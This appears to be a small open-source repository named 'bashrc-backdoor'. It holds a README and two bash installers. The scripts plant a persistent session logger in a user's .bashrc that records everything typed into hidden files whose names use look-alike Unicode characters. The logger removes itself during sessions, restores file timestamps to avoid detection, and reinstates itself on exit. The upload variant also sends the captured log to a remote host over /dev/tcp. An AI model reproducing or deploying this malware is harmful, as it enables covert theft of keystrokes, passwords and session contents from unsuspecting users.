├── README.md
├── install.sh
└── with_upload.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # bashrc-backdoor
 2 | 
 3 | A simple backdoor for bashrc
 4 | 
 5 | ## file description
 6 | 
 7 | * [install.sh](install.sh) - basic version: just log to file
 8 | * [with_upload.sh](with_upload.sh) - basic version but will upload to specified remote machine, if failed to connecting, cancel all changes to the system
 9 | 
10 | ## Features
11 | 
12 | 1. No external dependencies, just bash, script, cat, touch, stat command
13 | 2. Basic self protection: clean up .bashrc file when session started, restore before bash exit, so the target will not be able to remove the virus from bashrc easily (or even detect it)
14 | 3. No privilege required, no root, no PAM module
15 | 
16 | ## License
17 | 
18 | WTFPL
19 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # CUSTIMIZE BEFORE UPLOAD
 3 | 
 4 | fakerc=~/.bаsh_login
 5 | logfile=~/.bаsh_cache
 6 | waitsec=1
 7 | changetime=$(stat -c %Y ~/.bashrc)
 8 | 
 9 | read script <<EOF
10 | exec script -B "$logfile" -afqc "bash --rcfile '$fakerc'"
11 | EOF
12 | quoted=$(printf "%q" "$script")
13 | 
14 | # UI BEGIN
15 | 
16 | print() { echo -e "$*"; }
17 | printvar() { printf " + \e[1;32m%s\e[m = \e[4;5m%s\e[m\n" $1 "${!1}"; }
18 | 
19 | printvar fakerc
20 | printvar logfile
21 | printvar script
22 | printvar quoted
23 | 
24 | print "\e[5;7m  wait for \e[1m$waitsec\e[0;5;7m secs, ctrl+c to interrupt  \e[m"
25 | sleep $waitsec
26 | print "installing..."
27 | 
28 | # UI END
29 | 
30 | cat >"$fakerc" <<EOF
31 | self=\$(cat "$fakerc")
32 | self=\$(printf "%q" "\$self")
33 | rm -f "$fakerc"
34 | sed -i "/^exec script -B/d" ~/.bashrc
35 | touch -d @$changetime ~/.bashrc
36 | trap "echo $quoted >> ~/.bashrc && echo \$self > '$fakerc'" EXIT
37 | unset self
38 | . ~/.bashrc
39 | EOF
40 | echo $script >> ~/.bashrc
41 | 


--------------------------------------------------------------------------------
/with_upload.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # CUSTIMIZE BEFORE UPLOAD
 3 | 
 4 | fakerc=~/.bаsh_login
 5 | logfile=~/.bаsh_cache
 6 | remote=/dev/tcp/127.0.0.1/1234
 7 | waitsec=1
 8 | changetime=$(stat -c %Y ~/.bashrc)
 9 | 
10 | read script <<EOF
11 | exec script -B "$logfile" -fqc "bash --rcfile '$fakerc'"
12 | EOF
13 | quoted=$(printf "%q" "$script")
14 | 
15 | # UI BEGIN
16 | 
17 | print() { echo -e "$*"; }
18 | printvar() { printf " + \e[1;32m%s\e[m = \e[4;5m%s\e[m\n" $1 "${!1}"; }
19 | 
20 | printvar fakerc
21 | printvar logfile
22 | printvar script
23 | printvar remote
24 | 
25 | print "\e[5;7m  wait for \e[1m$waitsec\e[0;5;7m secs, ctrl+c to interrupt  \e[m"
26 | sleep $waitsec
27 | print "installing..."
28 | 
29 | # UI END
30 | 
31 | cat >"$fakerc" <<EOF
32 | self=\$(cat "$fakerc")
33 | self=\$(printf "%q" "\$self")
34 | rm -f "$fakerc"
35 | sed -i "/^exec script -B/d" ~/.bashrc
36 | touch -d @$changetime ~/.bashrc
37 | trap "2>/dev/null cat '$logfile' > '$remote' && echo $quoted >> ~/.bashrc && echo \$self > '$fakerc'; rm -f '$logfile'" EXIT
38 | unset self
39 | . ~/.bashrc
40 | EOF
41 | echo $script >> ~/.bashrc
42 | 


--------------------------------------------------------------------------------